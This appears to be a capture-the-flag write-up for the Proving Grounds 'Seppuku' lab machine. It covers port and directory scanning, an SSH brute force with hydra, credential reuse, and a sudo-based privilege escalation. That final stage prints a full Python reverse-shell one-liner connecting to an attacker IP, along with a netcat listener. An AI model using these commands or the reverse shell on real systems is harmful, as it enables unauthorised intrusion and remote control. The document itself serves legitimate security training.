Proving Grounds: Seppuku
Information Gathering:
First, I scanned for the ports with nmap command and save it to text file.
nmap -T4 -Pn -p- 192.168.228.90 -oN Port.txt
I continued scanning for the services each ports.
nmap -T4 -Pn -sVC -p21,22,80,139,445,7080,7601,8088 192.168.228.90 -oN services.txt
i tried accessing the port 80 but i didn’t have any username and password to login. i had looked at page source and i had not found anything neither.
I scanned with dirsearch and i found only /info.php.
dirsearch -u http://192.168.228.90/
So, i went to check for the port 445 smb and found it was not accessible for anonymous user.
it wasn’t accessible with anonymous user.
smbmap -H 192.168.228.90
I also tried with smbclient.
there was nothing to share with anonymous user.
smbclient -L \\192.168.228.90 -N
Next, i started accessing to port 7080.
it was a page with message 404 Not Found.
I tried with scanning path and found nothing.
smbmap -H 192.168.228.90
So, I moved to port 7601. accessed to the webpage.
It was a page with only picture.
I decided to scan for the path again. This time i’ve found many paths.
So, let’s check it.
dirsearch -u http://192.168.228.90:7601/
I’ve checked every /path and it was nothing to do. but i saw the interesting /secret path so i went to it.
There were many files here so let’s check it.
For the details:
1.hostname: i got seppuku maybe a username.
2.jack.jpg: i tried binwalk and exiftool nothing special.
3.passwd.bak: some kind of rabbit hole file.
4.password.lst: this can be used for the bruteforcing since it was password list.
5.shadow.bak: rabbit hole file again.
Let’s check for another port 8088.
it seemed the same as the last one.
I used the dirsearch again to find some interesting paths.
Afterthat, i checked for all directories that i’ve found it was not interesting.
Exploitation:
i decided to use the information that’ve gathered as much as i had.
so the thing i wanted to do is to use the username “seppuku” that i’ve found from hostname file and password list from password.lst
to bruteforce the ssh login on port 22.
I used the hydra tool.
and i’ve found the password is eeyoree
hydra -l seppuku -P password.lst ssh://192.168.228.90
Next, i connected to port 22 SSH
username: seppuku , password: eeyoree
I spawned the interactive shell. so, i can use the command without any problems. (Noticed that python was intalled on this system.)
python3 -c 'import pty;pty.spawn("/bin/bash")'
Let’s get the first flag.
I’ve saw something like .passwd, tried to read it and it was someone’s password.
I went checking for /etc/passwd if there were others users in the system.
and i’ve found samurai and tanto
so i can use with the password from .passwd.
cat /etc/passwd
Explore the others directories. I found nothing special.
Next step, i was looking to the path /var/www/html maybe i missed something with my scanning tool because i used the default wordlist with not much words to scan.
and there were additional files that i’ve missed.
I checked in the keys/ directory and found a file called private.
looks like i can use this to login with wether samurai or tanto.
before i go to change the user, i had to use the sudo -l for listing the commands that the current user is allowed to run. just to make sure that maybe i can escalate to root as seppuku user.
so…
The entry NOPASSWD: /usr/bin/ln -sf /root /tmp/ in the sudoers file means that the user is allowed to run the ln -sf /root /tmp/ command as root without being prompted for a password.
sudo -l
after spent a couple of time i couldn’t find a way to use the ln. so i had to find the others ways to escalate priviledge.
Change the user account.
i tried using su with samurai and tanto.
and i could used samurai with password from .passwd
username: samurai , password: 12345685213456!@!@A
Priviledge Escalation:
Afterward, i used sudo -l again to check which program i can use with samurai user.
and i’ve found /../../../../../../home/tanto/.cgi_bin/bin /tmp/* can use for samurai user.
So, i tried using the program and i’ve found there were no file in the tanto’s directory.
From the recent i had checked the tanto’s directory and i could not find .cgi_bin directory.
I think i have to create it manually. but i didn’t have permission to that in tanto’s with samurai user.
so, i have to switch to tanto user.
Where is the password for tanto?
Yeah, i didn’t have it. but i could use with sshkey from /var/www/html/keys/private file.
since i was loggin in to the target system so i had to specific the IP to 127.0.0.1.
it was successful.
ssh -i private tanto@127.0.0.1
Let’s create a folder and add some reverse shell command or any command that can do priviledge escalation.
i navigated to revshells.com and generate the payload.
I used the Python payload since i noticed that i could spawn interactive shell with python command.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.187",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
Listening to any port and wait for the connection.
nc -nlvp 8000
Let’s get this job done.
I went back to tanto and created the .cgi_bin directory with bin file. then input the payload to a file.
don’t forget to add #!/bin/bash at the header so we can use this file without any problems.
and the important part is to change the permission of the file.
chmod 777 bin
Now, the setup was ready. i headed back to samurai account and executed the file.
And, it was done !
